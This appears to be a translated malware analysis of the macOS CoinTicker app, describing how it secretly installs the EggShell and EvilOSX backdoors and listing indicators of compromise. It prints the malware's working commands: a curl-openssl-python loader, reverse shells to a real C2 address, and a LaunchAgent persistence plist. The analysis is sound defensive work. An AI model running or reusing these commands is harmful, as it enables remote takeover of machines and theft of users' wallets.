Mac上的加密货币价格追踪应用CoinTicker后门分析 – 作者:周大涛

写在前面的话

我们论坛的贡献者弗拉基米尔在论坛上看到一个名叫CoinTicker的应用程序在周末表现出一些可疑行为。这款应用似乎不仅秘密地安装了一个后门,而且还安装了两个不同的后门。

行为分析

从表面上看,CoinTicker应用程序似乎是一个合法的应用程序,可能对投资加密货币的人有用。下载后,该应用程序会在菜单栏显示一个图标,显示当前比特币价格的信息。 1.png应用程序的首选项允许用户自定义显示有关各种加密货币的信息,包括比特币,Etherium和Monero。 2.png虽然这个功能似乎是合法的,但是应用程序后台干什么用户不知道。可是,在推出时,应用程序会下载并安装两个不同的开源后门组件:EvilOSX和EggShell。该应用程序执行以下shell命令以下载用于macOS的自定义编译的EggShell服务器版本:

nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py

该命令的第一部分从属于名为“youarenick”的用户的Github页面下载编码文件,并将该文件保存到/ private/tmp/中名为.info.enc的隐藏文件中。接下来,它使用openssl将该文件解码为名为.info.py的隐藏Python文件。最后,它执行生成的Python脚本。该.info.py脚本执行多个任务。首先,它使用以下命令打开与cc服务器的反向shell连接:

nohup bash&> /dev/tcp/94.156.189.77/2280 0>&1(域seednode3.parsicoin.net解析为此IP地址。)

接下来,它下载EggShell mach-o二进制文件,将其保存到/tmp/espl:

curl -k -L -o / tmp / espl https://github.com/youarenick/newProject/raw/master/mac

最后,它在/tmp/.server.sh创建并运行shell脚本,该脚本还建立了反向shell。

#!/ bin / bash 
nohup bash&> /dev/tcp/94.156.189.77/2280 0>&1

CoinTicker应用程序还会创建一个名为.espl.plist的用户启动代理程序,它定期运行相同的命令:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>AbandonProcessGroup</key>
  <true/>
  <key>Label</key>
  <string>com.apple.espl</string>
  <key>ProgramArguments</key>
  <array>
    <string>sh</string>
    <string>-c</string>
    <string>nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py</string>
  </array>
  <key>RunAtLoad</key>
  <true/>
  <key>StartInterval</key>
  <integer>90</integer>
</dict>
</plist>

这似乎导致espl二进制文件被多次启动,那确实是这种情况。
3.png该软件还在用户的Containers文件夹中创建了一个名为.UpQZdhkKfCdSYxg的文件夹,该文件夹是名为  plQqVfeJvGo的Python脚本(我们认为这些名称是随机的,但遗憾的是CoinTicker应用程序已停止运行,因此我们无法确认。)此脚本经过编码以隐藏内容:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import getpass
import uuid
def get_uid():
return "".join(x.encode("hex") for x in (getpass.getuser() + "-" + str(uuid.getnode())))
exec("".join(os.popen("echo 'U2FsdGVkX19GsbCj4lq2hzo27vqseHTtKbNTx9
...
TjO1GlH1+7cP7pDYa8ykBquk4WhU0/UqE' | openssl aes-256-cbc -A -d -a -k %s -md md5" % get_uid()).readlines()))

提取脚本可以发现它就是来自Github用户Marten4n6制作的EvilOSX后门。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Minimal bot which loads modules as they are needed from the server."""
__author__ = "Marten4n6"
__license__ = "GPLv3"
__version__ = "4.1.1"
...

这个脚本是定制的,可以使后门在端口1339上与服务器185.206.144.226通信。该恶意软件还创建了一个名为com.apple.EOFHXpQvqhr.plist的用户启动代理,用于保持此脚本运行。

影响

虽然还不清楚这个恶意软件背后的黑客到底想要达到什么目的,但是EggShell和EvilOSX都是可以用于各种目的后门。然而,由于恶意软件是通过加密货币应用程序分发的,因此该恶意软件似乎是为了获取用户加密货币钱包的访问权,从而窃取硬币。起初,这看起来可能是一个供应链的攻击,然而,在进一步的检查中,看起来这个应用程序可能从一开始就不合法。首先,这款应用通过一个名为coin-sticker.com的域名发布。这和app的名字很接近,但又不完全一样。

IOC

 创建的文件:

/private/tmp/.info.enc
/private/tmp/.info.py
/private/tmp/.server.sh
/private/tmp/espl
~/Library/LaunchAgents/.espl.plist
~/Library/LaunchAgents/com.apple.[random string].plist
~/Library/Containers/.[random string]/[random string]

网络连接:

94.156.189.77:2280
185.206.144.226:1339

SHA-256:

CoinTicker.zip f4f45e16dd276b948dedd8a5f8d55c9e1e60884b9fe00143cb092eed693cddc4
espl efb5b32f87bfd6089912073cb33850c58640d59cb52d8c63853d97b4771bc490

*参考来源malwarebytes,周大涛编译,转载请注明来自FreeBuf.COM

来源:freebuf.com 2018-12-14 13:00:15 by: 周大涛

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论